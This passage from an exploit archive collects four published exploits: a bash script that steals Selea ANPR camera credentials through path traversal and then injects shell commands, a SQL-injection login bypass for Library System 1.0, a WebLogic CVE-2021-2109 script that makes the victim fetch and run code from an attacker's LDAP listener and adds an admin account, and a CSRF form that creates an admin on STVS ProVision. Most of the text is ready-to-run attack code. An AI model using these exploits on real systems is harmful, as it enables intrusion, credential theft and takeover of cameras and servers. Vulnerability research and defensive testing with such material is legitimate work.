                  CPS:      4.013(201105)
                            3.100(200225)
                            3.005(191206)
                            3.005(191112)

Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre.

Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream disclosure when p1.mjpg or p1.264 is called.

Tested on: GNU/Linux 3.10.53 (armv7l)
           PHP/5.6.22
           selea_httpd
           HttpServer/0.1
           SeleaCPSHttpServer/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5619
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php


07.11.2020

--


Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
  22. # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com

#!/bin/bash
#
# Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution
#
#
# Vendor: Selea s.r.l.
# Product web page: https://www.selea.com
# Affected version: Model:    iZero
#                             Targa 512
#                             Targa 504
#                             Targa Semplice
#                             Targa 704 TKM
#                             Targa 805
#                             Targa 710 INOX
#                             Targa 750
#                             Targa 704 ILB
#                   Firmware: BLD201113005214
#                             BLD201106163745
#                             BLD200304170901
#                             BLD200304170514
#                             BLD200303143345
#                             BLD191118145435
#                             BLD191021180140
#                             BLD191021180140
#                   CPS:      4.013(201105)
#                             3.100(200225)
#                             3.005(191206)
#                             3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated
# LFI issue an attacker can grab credentials, authenticate and execute system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
# 01: #!/bin/sh
# 02: . /mnt/app/scripts/env.sh
# 03: . /mnt/app/scripts/log.sh
# 04:
# 05: CMD="$1"
# 06: ADDR="$2"
# 07: PORT="$3"
# 08:
# 09: if [ "$CMD" == "ping" ]; then
# 10:   RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
# 11: elif [ "$CMD" == "port" ]; then
# 12:   log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
# 13:   RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
# 14: fi
# 15:
# 16: echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            PHP/5.6.22
#            selea_httpd
#            HttpServer/0.1
#            SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

IP=$1
CMD=$2
PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}
AUTH=$(echo admin:${PWD} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}
curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
  23. # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection

#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnerable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.

import requests

YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('**                LIBRARY SYSTEM 1.0                  **')
print('**     AUTHENTICATION BYPASS USING SQL INJECTION      **')
print('********************************************************')
print('Author - Himanshu Shukla')

#Create a new session
s = requests.Session()

#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

LINK=input("Enter URL of The Vulnerable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)

#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in

if l:
    print(GREEN+"[+]Authentication Bypass Successful!", RESET)
    print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
    print(RED+"[-]Failed To Authenticate!", RESET)
  24. # Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''
    Copyright 2021 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2021-2109.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from https://github.com/welk1n/JNDI-Injection-Exploit to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None
## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''):
            self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''):
            self.stderr += line

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
            print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult)

def checkParams(options, args):
    if args:
        sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
    if sHost[-1:] == '/': sHost = sHost[:-1]
    if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        '  Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        '  in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
    )
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)
    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)

    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Successfully logged in!\n')
    else: exit('[-] Authentication Denied')

    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability: the victim retrieves LDAP data which then runs on the victim;
    ## it bypasses verification because the IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        endIt()
  25. # Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch

STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)

Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version: 5.9.10 (build 2885-3a8219a)
                  5.9.9 (build 2882-7c3b787)
                  5.9.7 (build 2871-a450938)
                  5.9.1 (build 2771-1bbed11)
                  5.9.0 (build 2701-6123026)
                  5.8.6 (build 2557-84726f7)
                  5.7
                  5.6
                  5.5

Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5625
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php

19.01.2021

--

<html>
  <body>
    <form action="http://192.168.1.17/users/create" method="POST">
      <input type="hidden" name="login" value="testingus" />
      <input type="hidden" name="password" value="testingus" />
      <input type="hidden" name="confirm&#95;password" value="testingus" />
      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="never&#95;expire" value="on" />
      <input type="hidden" name="disabled&#95;acc" value="false" />
      <input type="submit" value="Forge request" />
    </form>
  </body>
</html>
